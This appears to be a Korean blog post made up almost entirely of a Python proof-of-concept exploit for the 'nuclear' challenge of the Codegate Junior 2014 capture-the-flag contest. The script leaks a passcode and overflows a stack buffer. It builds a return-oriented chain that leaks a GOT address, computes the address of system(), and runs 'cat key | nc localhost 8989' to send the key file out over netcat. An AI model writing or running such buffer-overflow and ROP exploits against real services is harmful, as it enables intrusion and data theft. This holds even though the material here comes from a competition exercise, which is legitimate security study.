#!/usr/bin/python
from socket import *
from struct import *
from time import *
p = lambda x : pack("<L",x)
up = lambda x : unpack("<L",x)[0]
s = socket(AF_INET,SOCK_STREAM)
s.connect(('127.0.0.1',1129))
pppr = 0x804917d
ppr = pppr+1
pr = ppr+1
sockopt_got = 0x0804B00C
recv_plt = 0x080488E0
send_plt = 0x08048900
recv_inner = 0x08048A6F
send_inner = 0x08048A0D
freespace = 0x0804b088
offset = 0xb2860
cmd = "cat key | nc localhost 8989"
def leak_passcode():
s.recv(1024)
s.send("target")
s.recv(1024)
s.send("a"*512)
s.recv(1024)
ps = s.recv(1024)
ps = ps.split(":")
return (ps[1])[1:]
def sockoptgot_leak(ps):
s.send("launch")
s.recv(1024)
s.send(ps+"\n")
s.recv(1024)
payload = "a"*528
payload += p(send_inner)
payload += p(ppr)
payload += p(4)
payload += p(sockopt_got)
payload += p(recv_inner)
payload += p(pppr)
payload += p(4)
payload += p(freespace)
payload += p(len(cmd)+1)
payload += p(recv_inner)
payload += p(pppr)
payload += p(4)
payload += p(recv_inner)
payload += p(4)
payload += p(recv_inner)
payload += p(0xdeadbeef)
payload += p(freespace)
s.send(payload+"\n")
s.recv(1024)
sleep(1)
recved = up(s.recv(1024)[:4])
print "this is socketopt : "+hex(recved)
system = recved-offset
print "this is system : "+hex(system)
return system
if __name__=="__main__":
passcode = leak_passcode()
sys = sockoptgot_leak(passcode)
s.send(cmd+"\x00"+"\n")
s.send(p(sys))
print "[*]boom boom boom"
2014년 5월 15일 목요일
Codegate junior 2014 nuclear exploit
POC exploit code
피드 구독하기:
댓글 (Atom)
댓글 없음:
댓글 쓰기